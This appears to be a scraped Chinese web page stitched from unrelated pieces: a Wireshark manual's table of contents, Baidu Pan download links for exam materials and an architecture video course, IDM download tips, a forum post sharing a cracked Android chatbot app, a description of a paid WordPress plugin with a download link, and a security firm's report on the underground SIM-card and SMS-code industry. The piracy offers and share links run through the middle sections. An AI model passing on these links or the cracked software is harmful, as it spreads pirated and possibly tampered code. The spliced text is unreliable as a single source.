7.3.2. 捕捉文件格式......................................................................................................................................... 67

7.3.3. 准确性.................................................................................................................................................... 67

7.4. 时区.................................................................................................................................................................. 68

7.4.1. 正确设置你的计算机的时区................................................................................................................... 68

7.4.2. Wireshark和时区的关系......................................................................................................................... 68

7.5. 合并包.............................................................................................................................................................. 69

7.5.1. 什么是合并包......................................................................................................................................... 69

7.5.2. 如何用Wireshark合并包........................................................................................................................ 69

7.6. 名称解析.......................................................................................................................................................... 70

7.6.1. 名字解析的流弊..................................................................................................................................... 70

7.6.2. 以太网名字解析(mac层)......................................................................................................................... 70

7.6.3. IP地址解析(网络层)................................................................................................................................ 70

7.6.4. IPX名称解析(网络层).............................................................................................................................. 71

7.6.5. TCP/UDP端口名解析(传输层).................................................................................................................. 71

7.7. 校检和.............................................................................................................................................................. 71

7.7.1. Wireshark校检和验证............................................................................................................................. 71

7.7.2. Checksum offloading................................................................................................................................. 72

第 8 章 统计............................................................................................................................................................. 73

8.1. 说明.................................................................................................................................................................. 73

8.2. 摘要窗口.......................................................................................................................................................... 73

8.3. "Protocol Hierarchy"窗口................................................................................................................................... 74

8.4. "Endpoints"....................................................................................................................................................... 75

8.4.1. 什么是Endpoint?.................................................................................................................................... 75

8.4.2. "Endpoints"窗口...................................................................................................................................... 75

8.4.3. 特定协议的"Endpoint List"窗口............................................................................................................... 76

8.5. 会话/conversations........................................................................................................................................... 76

8.5.1. 什么是会话/conversation?...................................................................................................................... 76

8.5.2. "Conversations/会话" window.................................................................................................................. 76

8.5.3. 协议指定“Conversation List/会话列表”窗口........................................................................................ 77

8.6. "IO Graphs"窗口................................................................................................................................................ 77

8.7. 服务相应时间................................................................................................................................................... 78

8.7.1. "Service Response Time DCE-RPC"窗口....................................................................................................... 78

8.8. 协议指定统计窗口........................................................................................................................................... 79

第 9 章 个性化Wireshark......................................................................................................................................... 80

9.1. 说明.................................................................................................................................................................. 80

9.2. 从命令行启动Wireshark................................................................................................................................... 80

9.3. 包色彩显示设置............................................................................................................................................... 83

9.4. 设置协议解码................................................................................................................................................... 85

9.4.1. "Enable Protocols"对话框......................................................................................................................... 85

9.4.2. 用户指定解码器..................................................................................................................................... 86

9.4.3. 显示用户指定解码器.............................................................................................................................. 87

9.5. 首选项.............................................................................................................................................................. 87

9.6. 用户表表^[21]...................................................................................................................................................... 88

9.7. 创建过滤宏....................................................................................................................................................... 88

9.8. Tektronics K12xx/15 RF5协议表......................................................................................................................... 89

9.9. 用户DLTs协议表............................................................................................................................................ 89

9.10. SNMP用户表................................................................................................................................................... 90

下载地址：hello

华图 链接：https://pan.baidu.com/s/1jH5Akcu

密码：u4gj

中公 链接：https://pan.baidu.com/s/1pLqhe4r

密码：aykk

粉笔 链接：https://pan.baidu.com/s/1kVvFlZL

密码：h3y3

链接挂了不补。尽快保存

可能很多人在评论后都在等待着我这个不负责任的人快点通过审核，好查看想看的内容，但是，我不能1天24小时一直守着后台，所以很多时候看到你们的留言，都差不多是第二天了，所以在这里给各位说一下，一般留言，第二天就会审核的。还有人建议关掉评论审核，这一点我也想过，但是辣鸡评论太多，根本就删不过来。还有人以自己那可怜的智商，来质疑我。有些文章，我只不过是采取最最简单的方法，把下载链接的文本颜色变了个颜色而已，结果有人在我再三提示下还是没找到，然后跑过来骂我骗人，坑人。这种人，没什么多说的。我给的提示都那么明显了，这种智商不适合访问本网站。谢谢理解

首先，IDM下载百度云的大文件当然首选油猴，如果油猴都没有装，那这个教程就没什么用了。
油猴安装方法在论坛这个帖子里：https://www.52pojie.cn/thread-632157-1-1.html
IDM下载可能出现的问题1：下载中途，出现下图需要输入用户名和密码的情况

解决方法：返回百度下载的页面，用油猴插件提取出下载地址，然后返回IDM，右键刚才下载中断的文件，属性，将刚才复制的地址粘贴到IDM的文件属性地址栏里，即可返回主界面点“继续任务”下载。
IDM下载可能出现的问题2：大压缩文件解压缩时提示错误
方法①：将rar后缀改成7z，解压缩即可解决（有几率继续出错，则跳方法②）
方法②：使用免费开源软件“7-Zip”，官网下载地址：https://sparanoid.com/lab/7z/，出错几率会大大降低
方法③：（谢谢网友wooshal的补充）：7z不灵 用winrar的修复功能修复后尝试打开

目前安卓破解方面不仅仅需要应对开发者，同时需要面对加固商的挑战，要破解你得先解决加固问题。

（长远看来逆向之路未来将越来越难。。。）

今天给大家破解分享这款软件：Codeboy聊天机器人，是360加固，软件版本2.3.0

之前看到有人·在论坛分享过不http://www.52pojie.cn/thread-472596-1-1.html过不是破解版，仅仅是让你体验！

这里完全解锁所有功能：去除第三方链接与联系方式，特意分享论坛。

(防止某些专业加广告的破坏，破解包进行了加固)

声明：仅供个人使用！

百度云链接：http://pan.baidu.com/s/1bpjAtNx 密码：rsxi

测试截图（自动抢红包貌似最新版微信不可以，可以试试6.3微信版本）

By 笑对VS人生
(2017.2.26)

以下内容来自网络：Codeboy聊天机器人是一款可以自动回复的工具，不需要root权限，通过Android原生系统的api实现模拟回复操作，完全自动化。
回复的内容可以自定义，可以根据部分匹配、完全匹配、正则匹配关键词，也可以通过服务器接口响应回复内容。

主要功能如下:
1、自动回复好友消息;
2、红包消息提醒；
3、自动接收好友添加消息；
4、支持锁屏下回复好友消息；
5、支持关键字自定义回复；
6、支持服务器自定义回复；

更多详情请百度一下.................

===============课程目录===============
│  │  ├<架构师>
│  │  │  ├第01节：整体课程概览.avi
│  │  │  ├第02节：分模块、分工程管理.avi
│  │  │  ├第03节：多模块多Web应用合并War包.avi
│  │  │  ├第04节：Git基本原理和安装配置使用.avi
│  │  │  ├第05节：TortoiseGit的本地使用.avi
│  │  │  ├第06节：Egit的本地使用.avi
│  │  │  ├第07节：远程使用以及冲突解决.avi
│  │  │  ├第08节：基本业务功能和数据字典.avi
│  │  │  ├第09节：搭建基础的开发环境.avi
│  │  │  └第10节：Spring+Mybatis实现DAO.avi
│  │  │  ├第11节：Mybatis的分页实现.avi
│  │  │  ├第12节：Service的实现以及模块化.avi
│  │  │  ├第13节：Spring MVC实现Web层开发.avi
│  │  │  ├第14节：新增和列表页面和分页tag.avi
│  │  │  ├第15节：带查询的分页、修改和删除页面.avi
│  │  │  ├第16节：Mybatis动态查询和Json自动拼装.avi
│  │  │  ├第17节：X-gen生成所需的DAO部分模板.avi
│  │  │  ├第18节：X-gen所需service、web层模板.avi
│  │  │  ├第19节：X-gen生成相应的Visitor.avi
│  │  │  └第20节：X-gen生成需要的Action.avi
│  │  │  ├第21节：通过X-gen生成商品模块.avi
│  │  │  ├第22节：通过X-gen生成购物车模块.avi
│  │  │  ├第23节：通过X-gen来生成订单和库存模块.avi
│  │  │  ├第24节：加入ehcache，把工程加入到Git.avi
│  │  │  ├第25节：实现前端的业务登录等功能.avi
│  │  │  ├第26节：测试并调整登录的业务功能.avi
│  │  │  ├第27节：实现index功能的开发.avi
│  │  │  ├第28节：Index、商品详细页和购物车.avi
│  │  │  ├第29节：完成下订单和修改库存的功能.avi
│  │  │  └第30节：把应用部署到Linux服务器上.avi
│  │  │  ├第31节：Nginx简介、安装和基本运行.avi
│  │  │  ├第32节：Nginx的进程结构、基本配置.avi
│  │  │  ├第33节：Nginx常用核心模块指令.avi
│  │  │  ├第34节：Nginx的Http模块部分的指令.avi
│  │  │  ├第35节：Nginx的Location区段.avi
│  │  │  ├第36节：Nginx的反向代{过}{滤}理模块.avi
│  │  │  ├第37节：反向代{过}{滤}理和动静分离的实现.avi
│  │  │  ├第38节：Nginx的负载均衡模块.avi
│  │  │  ├第39节：Nginx的Rewrite模块.avi
│  │  │  └第40节：更多模块的基本功能和配置.avi
│  │  │  ├第41节：Nginx的配置优化以及使用建议.avi
│  │  │  ├第42节：应用上Nginx过后的体系结构.avi
│  │  │  ├第43节：Varnish简介、安装和基本使用.avi
│  │  │  ├第44节：VCL基本语法和使用，负载均衡.avi
│  │  │  ├第45节：VCL实现健康检查、ACL访问控制.avi
│  │  │  ├第46节：Grace模式和Saint模式.avi
│  │  │  ├第47节：VCL常用的函数和Http头.avi
│  │  │  ├第48节：VCL的子程序和Request流程.avi
│  │  │  ├第49节：VCL的变量和常见的应用片断.avi
│  │  │  └第50节：使用CLI来管理Varnish.avi
│  │  │  ├第51节：Varnishd命令和运行期参数.avi
│  │  │  ├第52节：Varnish的日志操作.avi
│  │  │  ├第53节：规划缓存大小和提高命中率.avi
│  │  │  ├第54节：性能调优和配置使用建议.avi
│  │  │  ├第55节：Nginx+Varnish组合应用.avi
│  │  │  ├第56节：Varnish对性能的提升和优化.avi
│  │  │  ├第57节：应用上Varnish后的体系结构.avi
│  │  │  ├第58节：Memcached入门和缓存的含义.avi
│  │  │  ├第59节：Memcached基本的工作原理.avi
│  │  │  └第60节：Memcached基本的操作命令.avi
│  │  │  ├第61节：理解Memcached的数据存储方式.avi
│  │  │  ├第62节：内存分配的Chunk、Slab演示.avi
│  │  │  ├第63节：Memcached的Java客户端开发.avi
│  │  │  ├第64节：理解Memcached的分布式方式.avi
│  │  │  ├第65节：Memcached内存调优.avi
│  │  │  ├第66节：Memcached的限制和使用建议.avi
│  │  │  ├第67节：分析如何使用Memcached开发.avi
│  │  │  ├第68节：Memcached结合业务功能开发.avi
│  │  │  ├第69节：Nginx+Varnish+基本业务功能+Memcached.avi
│  │  │  └第70节：应用Memcached后的体系结构.avi
│  │  │  ├第71节：ActiveMQ入门和消息中间件.avi
│  │  │  ├第72节：JMS基本概念和模型.avi
│  │  │  ├第73节：JMS的可靠性机制.avi
│  │  │  ├第74节：JMS的API结构和开发步骤.avi
│  │  │  ├第75节：Broker的启动方式.avi
│  │  │  ├第76节：ActiveMQ结合Spring开发.avi
│  │  │  ├第77节：ActiveMQ支持的传输协议.avi
│  │  │  ├第78节：ActiveMQ消息存储持久化.avi
│  │  │  ├第79节：ActiveMQ的静态网络链接.avi
│  │  │  └第80节：多线程consumer访问集群.avi
│  │  │  ├第81节：集群下的消息回流功能.avi
│  │  │  ├第82节：容错的链接和动态网络连接.avi
│  │  │  ├第83节：ActiveMQ的集群.avi
│  │  │  ├第84节：Destination高级特性一.avi
│  │  │  ├第85节：Destination高级特性二.avi
│  │  │  ├第86节：MessageDispatch高级特性一.avi
│  │  │  ├第87节：MessageDispatch高级特性二.avi
│  │  │  ├第88节：MessageDispatch高级特性三.avi
│  │  │  ├第89节：Message高级特性一.avi
│  │  │  └第90节：Message高级特性二.avi
│  │  │  ├第91节：Consumer高级特性一.avi
│  │  │  ├第92节：Consumer高级特性二.avi
│  │  │  ├第93节：集成ActiveMQ和Tomcat.avi
│  │  │  ├第94节：AMQ优化和使用建议.avi
│  │  │  ├第95节：AMQ结合业务功能的开发一.avi
│  │  │  ├第96节：AMQ结合业务功能的开发二.avi
│  │  │  ├第97节：AMQ结合业务功能的开发三.avi
│  │  │  ├第98节：AMQ和业务功能组合测试.avi
│  │  │  ├第99节：基本的性能测试.avi
│  │  │  └第100节：应用上AMQ后的体系结构.avi
│  │  │  ├第101节：MongoDB简介和NoSQL.avi
│  │  │  ├第102节：MongoDB安装和基本使用.avi
│  │  │  ├第103节：MongoDB基本概念.avi
│  │  │  ├第104节：MongoDB增删改操作一.avi
│  │  │  ├第105节：MongoDB增删改操作二.avi
│  │  │  ├第106节：MongoDB查询操作一.avi
│  │  │  ├第107节：MongoDB查询操作二.avi
│  │  │  ├第108节：聚合框架第一部分.avi
│  │  │  ├第109节：聚合框架第二部分.avi
│  │  │  └第110节：聚合框架第三部分.avi
│  │  │  ├第111节：理解文档存储机制.avi
│  │  │  ├第112节：MongoDB的索引一.avi
│  │  │  ├第113节：MongoDB的索引二.avi
│  │  │  ├第114节：Capped集合和GridFS.avi
│  │  │  ├第115节：MongoDB的副本集一.avi
│  │  │  ├第116节：MongoDB的副本集二.avi
│  │  │  ├第117节：副本集的基本原理.avi
│  │  │  ├第118节：副本集管理和主从复制.avi
│  │  │  ├第119节：MongoDB的分片一.avi
│  │  │  └第120节：MongoDB的分片二.avi
│  │  │  ├第121节：MongoDB的分片三.avi
│  │  │  ├第122节：MongoDB分片的片键选择.avi
│  │  │  ├第123节：MongoDB分片的管理.avi
│  │  │  ├第124节：监控状态和身份验证.avi
│  │  │  ├第125节：备份和恢复.avi
│  │  │  ├第126节：Java操作MongoDB.avi
│  │  │  ├第127节：MongoDB和Spring.avi
│  │  │  ├第128节：应用建议及最佳实践.avi
│  │  │  ├第129节：MongoDB结合应用开发一.avi
│  │  │  └第130节：MongoDB结合应用开发二.avi
│  │  │  ├第131节：应用MongoDB后体系结构.avi
│  │  │  ├第132节：MogileFS简介和入门.avi
│  │  │  ├第133节：MogileFS安装和基本配置.avi
│  │  │  ├第134节：理解MogileFS的基本概念.avi
│  │  │  ├第135节：理解MogileFS的基本原理.avi
│  │  │  ├第136节：MogileFS的Java客户端开发.avi
│  │  │  ├第137节：基于MogileFS的小应用一.avi
│  │  │  ├第138节：基于MogileFS的小应用二.avi
│  │  │  ├第139节：基于MogileFS的小应用三.avi
│  │  │  └第140节：基于MogileFS的小应用四.avi
│  │  │  ├第141节：MogileFS和Nginx的集成.avi
│  │  │  ├第142节：应用MogileFS后体系结构变化.avi
│  │  │  ├第143节：阶段一小结合构建的基本架构.avi
│  │  │  ├第144节：阶段一工程整体打包部署.avi
│  │  │  ├第145节：测试Nginx、Varnish和MogileFS.avi
│  │  │  ├第146节：测试Memcached和MongoDB.avi
│  │  │  ├第147节：测试应用结合ActiveMQ的功能.avi
│  │  │  └第148节：阶段一之后的发展和架构演变.avi
│  │  ├<架构一代码和ppt>
│  │  │  ├ActiveMQ快速上手.pdf
│  │  │  ├Git快速上手.pdf
│  │  │  ├Maven补充.pdf
│  │  │  ├Memcached快速上手.pdf
│  │  │  ├MogileFS快速上手.pdf
│  │  │  ├MongoDB快速上手.pdf
│  │  │  ├Nginx快速上手.pdf
│  │  │  ├Varnish快速上手.pdf
│  │  │  ├基本业务功能.pdf
│  │  │  ├基础业务的建表语句.sql
│  │  │  └最终的project源码.rar
│  │  ├x-gen-ppt.zip
│  │  ├x-gen-projects.zip

链接：http://pan.baidu.com/s/1c1QeFU4 密码：wjeh

前端个人中心页面，如下：

模板兔已开发了深度集成此插件的Modown wordpress主题  、 Motu wordpress主题，与Mohtml主题也已集成，有需要的可以联系我们询价。

基本功能：

• 已经在程序中集成支付宝（担保交易/双功能接口/即时到帐）、银联、paypal、财付通、微信支付（扫码支付）、个人免签约支付（点击申请接口）
• 集成mycred积分插件，mycred积分兑换成erphpdown货币（另付费功能）购买此扩展
• 充值卡充值（管理员后台生成充值卡卡号卡密，可以放在第三方自动发卡平台出售，然后购买用用卡密来进行网站充值）（另付费功能）购买此扩展
• 设置会员提现手续费比率
• 设置支付宝异步处理订单
• 设置用户推广消费提成比率
• 设置货币昵称（例如：模板币）
• 设置充值比例（例如：1元=10模板币）
• 查询所有消费记录
• 查询所有充值记录
• 查看与处理取现申请列表
• 查看全部收益与推广
• 推广用户消费获得提成（这对管理员没必要）
• 后台所有资源列表，ajax修改价格
• 用户充值与扣费
• 查询用户余额、充值记录、消费记录
• 发布收费下载资源（支持外链，可设置解压密码，通过email发送给购买用户）
• 发布收费查看内容（支持全文内容收费查看以及部分内容收费查看）
• 在消费清单中下载资源
• 管理与、投稿者、订阅者权限分配（以上某些功能是管理员专有权限）
• 前端短代码调用

其他功能：

• 下载路径加密（内链）
• 申请提现
• VIP会员（包月、包季、包年、永久）特权（VIP专享、VIP半价、VIP八折、VIP免费）
• 一次购买，永久下载
• colorbox灯箱弹窗特效
• 前端个人中心（可直接充值、查看消费等）

更新记录：

• 新增一款个人支付接口，移除一款支付接口（支持支付宝与微信，详情请看插件里的接口设置），此版本可以设置支付完成后返回页面（erphpdown-显示设置 里设置）。    （v9.1    2017.08.01）
• 赠送的前端用户中心新增mycred积分兑换，简单适配手机端前端用户中心    （v9.0.4    2017.03.27）
• 增加支付宝官方接口支付的同步处理充值逻辑（为了暂时解决部分用户网站支付宝官方接口异步处理概率性失效问题）    （v9.0.3    2017.03.21）
• 修复mycred积分兑换的bug    （v9.0.2    2017.02.10）
• 新增VIP免费下载资源限制每天总下载资源个数（仅对VIP专享、VIP免费、包年VIP免费、终身VIP免费的资源有效）（使用此版本必须重启下插件），后台新增清理数据表冗余数据，修复erphpdown短代码支持嵌套其他短代码，修复微信支付的bug    （v9.0.1    2016.12.8）
• 新增自定义文章类型的支持（后台ErphpDown - 显示设置里可设置）、新增一款免签约充值接口（点击申请接口）、新增支付宝免签约即时到帐接口的支付结果通知、优化插件结构（为后面开放API文档做准备），更新前端用户中心页面文件。此次更新需要用户自行修改一些东西，具体请看下载包里的更新说明文档。模板兔建议此次升级流程：停用插件 - 删除旧插件 - 上传新插件 - 启用新插件，删除插件不会影响网站已存在的数据    （v9.0    2016.11.23）（PS：下个版本还会有惊喜哦~~）
• 新增后台VIP用户查询功能、所有推广用户记录，修复可能会出现重复购买的bug，赠送的前端用户中心支持VIP推广提成（需要使用新版的前端用户中心文件）    （v8.3.2    2016.09.27）
• 增加充值订单号长度（避免订单号重复），此升级可能会导致无法自动充值成功，若出现此问题，请重启下插件。若无法解决，请进网站数据库管理（phpmyadmin）修改数据表wp_ice_money 的ice_num字段，若是int类型，请改成varchar，长度改为50    （v8.3.1    2016.08.29）
• 新增支付宝免签约即时到帐接口，（点击申请接口）详情请看插件后台Erphpdown-账号设置    （v8.3    2016.08.27）
• 修复部分老用户网站无法自动处理支付结果的bug    （v8.2.1    2016.08.08）
• 新增年费VIP与终身VIP免费权限，移除购买时发邮件功能    （v8.2  2016.06.28）
• 优化代码    （v8.1.1  2016.05.21）
• 更新用户前端文件至8.1版本，前端支持充值卡充值    （v8.1  2016.05.08）
• 优化充值订单号长度（使用此版本必须重启下插件），优化弹窗购买框界面以及下载界面    （v8.0.2  2016.03.30）
• 修复后台处理提现的bug    （v8.0.1  2016.03.14）
• 新增微信支付，暂时关闭推广点击奖励，优化插件结构（赠送的前端文件修改过，请使用新的前端文件）    （v8.0  2016.02.23）
• 修复文章标题有单引号时导致无法购买的bug，新增支持SSL链接、迅雷下载链接、种子链接    （v7.0.1  2016.01.11）
• 修复重要bug，请务必升级到此最新版    （v7.0  2015.12.03）
• 修复用户前端提现不扣费的bug，后台申请的提现不影响    （v6.2.1  2015.11.13）
• 新增前端升级VIP以及充值地址自定义（适合有前端用户中心的用户）    （v6.2  2015.11.11）
• 新增批量管理所有VIP用户的到期时间，新增收费查看部分文章隐藏内容选项    （v6.1  2015.10.17）
• 修复后台添加VIP续费的bug    （V6.0.1  2015.06.24）
• 修复收费查看样式错乱以及提现偶尔出现负余额的bug    （V6.0  2015.06.20）
• 修复部分用户数据库无法写入的bug，新增后台VIP用户管理功能    （v5.0  2015.06.17）
• 修复部分bug  （v4.5.2  2015.05.13）
• 新增下载页面直接显示隐藏信息  （v4.5.1  2015.03.31）
• 支持访问推广链接获得提成（需重启插件方可生效）（v4.5  2015.03.04）
• 新增VIP会员续费功能，修复后台列表部分bug    （v4.4  2015.03.01）
• 新增资源免费下载功能，修复支付宝担保交易接口跳转的bug    （v4.3  2015.01.28）
• 新增mycred积分兑换（另付费功能，测试版本mycred 1.5.4）购买  （v4.2  2014.11.11）
• 新增支付宝转账付款，集成erphpdown充值卡（另付费功能）购买 （v4.1  2014.10.09）
• 优化前台下载样式（v4.0.1  2014.08.13）
• 新增财付通充值（功能待完美测试）（v4.0  2014.08.01）
• 优化后台。部分用户在使用过程中函数有冲突，所以修复了一些函数，使用前端页面的需要修改下前端里的部分函数名，具体看插件里的更新记录，数据不受任何影响（v3.0.2  2014.05.11）
• 新增用户购买后直接显示隐藏内容（比如 解压密码）（v3.0.1 2014.04.26）
• 新增前端个人中心短代码调用（v3.0 2014.04.23）
• 修复部分主机出现的bug（v2.2   2014.03.21）
• 修复支付宝异步处理bug（v2.1   2014.03.16）
• 修复bug、新增注册选项、优化下载（v2.0   2014.03.04）
• 优化下载（v1.5.4    2014.02.18）
• 修复bug（v1.5.3    2014.02.07）
• 修复bug、优化推广（v1.5.2    2014.01.18）
• 修复bug、新增ajax修改价格、异步处理充值选项、优化付费发布（v1.5    2014.01.04）
• 新增后台网站所有资源列表（v1.4    2013.12.10）
• 修复bug（v1.3.2    2013.12.09）
• 新增站内转账（v1.3    2013.11.29）
• 注册页新增验证码（v1.2.3    2013.11.26）
• 修复bug（v1.2.1    2013.11.20）
• 新增收费查看内容（v1.2    2013.11.19）
• 优化注册，新增密码输入（v1.1.1    2013.11.18）
• 支持支付宝担保交易（v1.1    2013.11.16）
• 支持支付宝即时到帐与双功能接口，银联支付，paypal贝宝支付（v1.0    2013.11.10）

Erphpdown 会员推广下载专业版  WordPress插件演示：

http://demo.mobantu.com/erphpdown/    用户名：test 密码：erphpdown

插件功能修改或二次开发需另收费，二次开发后插件若要升级，请自行备份好二次开发修改过的文件，做好标记，以便自行升级。

ps:插件请自行测试，转载自

wordpress

[tinr2v]

链接：http://pan.baidu.com/s/1dFit2Zf 密码：tgil

[/tinr2v]

手机黑卡似乎和大众没什么关系，但据说见过下面这张图的同学，每天的生活品质能提升30%。

楔子

言归正传，作为一家严肃的安全公司，其实猎人君是来尝试解决这类问题的。

作为老板，你是否发现搞活动时用户热火朝天，活动一撤就一潭死水？

作为策划，你是否只顾了活动的吸引人，而没有考虑对付虚假用户？

作为程序员，你是否觉得通过短信确认下用户就万事大吉了？

……

辛辛苦苦筹划的活动，好不容易申请了一批福利准备搞上一个月拉上几万优质用户，结果三天就来了十几万，五天就掏完了精心准备的小红包，第六天在线就蹭蹭掉，然而用户就像一阵风，再也不出现了。

如果你是活动策划，相信多少都经历过类似的场景，此时你的心情，一定是这样的。

如果想识别这些虚假用户，找猎人君就可以了，猎人君的“黑卡猎人”产品拥有经过多维度分析的海量恶意手机号码库，可以直接接入使用。但对猎人君来说，仅仅识别这些恶意手机号是不够的，更深的问题是，掌握如此海量手机黑卡的产业背后的故事：

他们是谁？
都是什么卡？
谁家流出的号？
他们又攻击了谁？
造成了多大的危害？
背后是怎样的产业链？

这不但是猎人君想知道的，更是每个活动策划应该知道的（先给老板打预防针，老板不但觉得你考虑周到，还能延长deadline，关键是出问题了锅还有人背不是么。。）

一. 他们是谁

你以为他们是这样点外卖的？

图森破！下面才是他们背后的装备：猫池（上图是另一个产业，以后也会深挖，可以关注公众号：ThreatHunter 第一时间获取后续爆料）：

当然，并不是代点个外卖还需要猫池这么高级的装备，这些装备由养卡人负责维护，并把收到的验证码通过软件传到特定的接码平台上，然后代点外卖的在平台付费获取验证码并在自己手机上登陆下单。看一下接码平台的收费：

看到没，只要1毛钱！再看看群里卖首单的喊价：

卖8-10块钱，80-100倍的利润啊，这 TM 让人如何能忍！！

二. 都是什么卡

为了调查这些手机黑卡的来源，猎人君决定亲自购买一些手机黑卡进行研究，来反向追踪黑卡来源。依旧是靠万能的 QQ 群，找到一些相关 QQ 群后，以收卡的名义和多位手机黑卡卖家进行了多番友好交流，获取了一些信息，并从不同渠道买到了几批卡。随后用买到黑卡的服务密码登陆运营商页面，查看这些卡的相关信息。并进一步通过电话的方式从部分官方渠道愉快地进行了核实。得到结论如下：

物联网卡

目前流通的手机黑卡中80%以上是物联网卡，无需实名认证。主要用于工业、交通、医疗、物流等领域。物联网卡只能以企业名义办理，需提供营业执照。物联网卡有不同套餐，手机黑卡主要使用的是以下两种套餐：

• 套餐一：0月租（或1月租），只能收短信或给1069打头的服务号码发送短信，没有语音功能不能接打电话，在手机黑卡产业内称作注册卡或短信卡。
• 套餐二：0月租（或1月租），有短信和语音功能，可以正常的接打电话和收发短信功能，在黑卡产业内被称作语音卡，除了可以用于接收短信验证码，还可用于接收语音验证码、发送验证短信这些单价更高的业务。

下图依次为在中国移动、中国联通、分享通信、银盛通信网上营业厅查到的卖到的黑卡的相关信息，可以看出都是没有实名认证的，都是企业认证的物联网卡。

物联网卡只能以企业名义办理，但企业可办理的物联网卡数量通常没有太大限制，可以大批量开卡。可以通过开设皮包公司方式轻松办理大量的物联网卡，如上图中的几家公司，手机黑卡灰产以这种方式轻易将办理的物联网卡转手用于灰产获取巨额收入。在这个过程中，运营商又是什么角色呢？在银盛通信这家虚拟运营商的网上营业厅，猎人君发现买到的黑卡的已订业务栏显示的居然是“验证码年卡”，有效期为一年。

据此，推测有些运营商会为灰产定制专用的物联网卡套餐。为了验证这一推测，猎人君联系上了某物联网卡业务经理，询问如何大量办理0月租只能收短信的物联网卡。果然，该业务经理主动问猎人君办卡是否是用于接码。当得到肯定回答后，对方给出了报价，并表示只需提供公司营业执照即可直接通过网络办理。

实名卡

按说实名制已经是硬性要求，但业绩和金钱如此迷人心智，是否能有完卵？勾勾搭搭这事情猎人君并不擅长，但还是不小心撩到了远特通信这家虚拟运营商。从上线了解到的消息，通过关系可以从这家虚拟运营商那里拿到大量未实名的卡，然后再从网络收集身份证信息来批量实名认证。在量足够大的情况下，远特通信甚至可以开放认证后台并提供批量的身份证信息给灰产人员自行去认证。此处应有后台界面一张：

海外卡

由于国内实名制的原因，手机黑卡产业大量获取国内手机卡将变得越来越困难。从2016年下半年开始，大量来自缅甸、越南、印尼等东南亚国家的手机卡开始进入国内手机黑卡产业。这些卡支持GSM网络，进入国内后可以直接使用，无需实名认证。同时，这些手机卡基本是0月租，收短信免费，成本低，非常适合手机黑卡产业使用，且使用比例越来越高。

三. 谁家流出的号

在调查手机黑卡产业链过程中，猎人君经过持续监控捕获了大量手机黑卡号码，并对这些黑卡进行了分析，分析结果如下：

• 虚拟运营商下的手机黑卡占所有黑卡的比例确高达59.81%，乃当之无愧的黑卡主力来源。虚拟运营商分配到手机卡号段只有170、171这两个号段，而所有运营商已发放号段有近40个，虚拟运营商以少量的号码资源贡献了大部分的黑卡。由此可见，虚拟运营商的手机卡中很大一部分流向了灰产领域。而实体运营商里中国联通与中国移动则旗鼓相当，相比之下，中国电信的管理则好很多，其手机卡流向灰产较少。

• 虚拟运营商由于找不到完整的号段分配表，大量联通的虚拟号段无法查到分配给了哪家虚拟运营商。能查到的迪信通、极信通信、普泰移动、蜗牛移动、远特通信、分享通信这6家的手机黑卡占所有手机黑卡的比例共4.85%，其内部占比情况如下：

• 由于中国移动、中国联通实行的是各地区分治，地区运营商的权限很大，导致各地区的管理差异非常大。中国移动的手机黑卡中仅广东东莞、辽宁辽阳、广东汕头这3个地区就占了80.5%，其中广东东莞更是重灾区，占比达54%。中国联通则呈现出遍地开花的态势，但也以江浙一带为高发区，占比达55%。

四. 谁在被攻击

通过对手机黑卡产业的攻击数据挖掘，猎人君发现攻击最多的前4大行业依次为互联网金融、电商、社交、O2O，占所有攻击的64.7%。

互联网金融

互联网金融行业可以说是受手机黑卡产业影响最严重的，各互联网金融平台为了吸引客户到自己的平台，争相砸入重金做各种新用户注册活动。羊毛党利用手机黑卡到各互联网金融平台大量的注册新用户，平台的活动经费大量的落入羊毛党的口袋中，活动的效果大打折扣，有的平台直接就被薅羊毛薅到倒闭。

电商

电商行业的攻击者主要通过各大电商平台注册账号，利用这些账号进行帮商家刷单、刷信誉等作弊行为，对电商的评价体系造成冲击，损害电商平台、正常经营的商家、买家的利益。被攻击的电商平台有：淘宝、京东、1号店、蘑菇街、唯品会等。

社交

攻击者在社交平台大量注册小号，用这些小号从事发广告、刷粉、刷阅读量、充当网络水军、传播色情内容、进行网络诈骗等等。被攻击最多的社交平台包括：微信、QQ、新浪微博、陌陌等。

O2O

近几年，O2O行业在国内的发展迅猛，各平台为了争夺用户下了血本，从2010年团购网站间的千团大战，到2014年滴滴和快的之间的24亿天价补贴大战，再到最近共享单车领域的红包单车大战，战况之激烈举世罕见。广大用户在这些大战中确实获取到了实惠，但获得收益更多的还是手里掌握着巨量手机黑卡资源的羊毛党们。像大众点评这样有商家入驻的O2O平台则跟电商平台一样遭受着来自养号者的攻击，评价体系被影响。

新趋势

随着互联网金融、电商、社交、o2o这些行业趋于成熟与稳定，可获取利益逐渐减少，手机黑卡产业开始寻找新的获利点，呈现出以下趋势：

• 由于国内市场趋于饱和，且竞争激烈，近几年国内的互联网公司开始进入海外市场，手机黑卡产业也追随着他们的步伐寻找海外市场的攻击目标。例如微信作为全球为数不多的可以跟Facebook、Whatsapp抗衡的社交平台，在积极开拓东南亚市场，手机黑卡产业敏锐的嗅到了商机，开始大规模的从东南亚获取手机黑卡，注册微信东南亚地区账号，从中获取灰色收入。
• 冷门的软件和服务称为攻击目标。由于热门目标的价值已经被开发得比较彻底，一些冷门的软件和服务开始被陆续手机黑卡产业发掘出来以获取更大的收益。比如：迅雷赚钱宝预约服务被黄牛党攻击，大量注册账号提升命中概率；一些积分墙软件也被大量注册账号，骗取任务奖励来获利。

五. 背后的产业链

关于黑卡产业背后的产业链，先看一张图：

卡源卡商

卡源卡商通过各种渠道（如：开皮包公司、与代理商打通关系等）从运营商或代理商那里办理大量的手机卡，然后加价转卖给下游卡商赚取差价，他们掌握着手机黑卡货源。

猫池厂家

猫池厂家负责生产猫池设备，并将设备卖给卡商使用。猫池是一种插上手机卡就可以模拟手机进行收发短信、接打电话、上网等功能的设备，在正常行业也有广泛应用，如邮电局、银行、证券商、各类交易所、各类信息呼叫中心等。猫池设备可以实现对多张手机卡的管理。前文插了许多卡的设备图就是猫池。

卡商

卡商从卡源卡商那里大量购买手机黑卡，将黑卡插入猫池设备并接入卡商平台，然后通过卡商平台接各种验证码业务，根据业务类型的不同，每条验证码可以获得0.1元-3元不等的收入。

卡商平台

负责连接卡商和羊毛党、号商等有手机验证码需求的群体，提供软件支持、业务结算等平台服务，通过业务分成获利。卡商平台很多，活跃的有数十家，比较知名的卡商平台有：Thewolf、星辰、爱乐赞、玉米等，其中Thewolf和星辰可以接语音验证码。2016年11月当时最大的卡商平台爱码被警方查处，随后很多平台转入地下。

羊毛党/号商

